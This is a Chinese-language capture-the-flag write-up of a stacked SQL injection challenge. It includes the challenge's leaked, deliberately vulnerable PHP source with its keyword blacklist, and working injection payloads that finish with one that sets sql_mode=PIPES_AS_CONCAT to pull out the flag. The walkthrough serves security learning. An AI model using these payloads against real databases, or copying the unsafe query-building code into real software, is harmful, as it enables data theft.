这题一开始做感觉是数字型注入,然后发现可以堆叠注入,但过滤了很多关键字
1;show databases; 爆出数据库
1;show tables; 爆出表名
1;show columns from Flag from被过滤用不了,尝试其他方式但还是会被过滤下来
看师傅们的做法:
当时的比赛环境有源码泄露,得到了源码
<?php
session_start();
include_once "config.php";
$post = array();
$get = array();
global $MysqlLink;
//GetPara();
$MysqlLink = mysqli_connect("localhost",$datauser,$datapass);
if(!$MysqlLink){
die("Mysql Connect Error!");
}
$selectDB = mysqli_select_db($MysqlLink,$dataName);
if(!$selectDB){
die("Choose Database Error!");
}
foreach ($_POST as $k=>$v){
if(!empty($v)&&is_string($v)){
$post[$k] = trim(addslashes($v));
}
}
foreach ($_GET as $k=>$v){
}
}
//die();
?>
<html>
<head>
</head>
<body>
<a> Give me your flag, I will tell you if the flag is right. </ a>
<form action="" method="post">
<input type="text" name="query">
<input type="submit">
</form>
</body>
</html>
<?php
if(isset($post['query'])){
$BlackList = "prepare|flag|unhex|xml|drop|create|insert|like|regexp|outfile
|readfile|where|from|union|update|delete|if|sleep|extractvalue|
updatexml|or|and|&|\"";
//var_dump(preg_match("/{$BlackList}/is",$post['query']));
if(preg_match("/{$BlackList}/is",$post['query'])){
//echo $post['query'];
die("Nonono.");
}
if(strlen($post['query'])>40){
die("Too long.");
}
$sql = "select ".$post['query']."||flag from Flag";
mysqli_multi_query($MysqlLink,$sql);
do{
if($res = mysqli_store_result($MysqlLink)){
while($row = mysqli_fetch_row($res)){
print_r($row);
}
}
}while(@mysqli_next_result($MysqlLink));
}
?>
过滤了很多,但没有过滤SET,且执行语句是
$sql ="select ".$post['query']."||flag from Flag"
||
在MYSQL中同样是逻辑或,flag就输出不了
set_mode=PIPPES_AS_CONCAT
将 || 视为字符串的连接操作符而非 或 运算符,这和Oracle数据库是一样的,也和字符串的拼接函数 CONCAT() 相类似。
如下图,可以看到22被当作字符连接到每一个查询结果上了
因此我们只要把||
当作字符操作符而不是执行或运算即可。
99;set sql_mode=PIPES_AS_CONCAT;select 0
在执行语句中是:
select 99;set sql_mode=PIPES_AS_CONCAT;select 0 ||flag from Flag
这样就输出了flag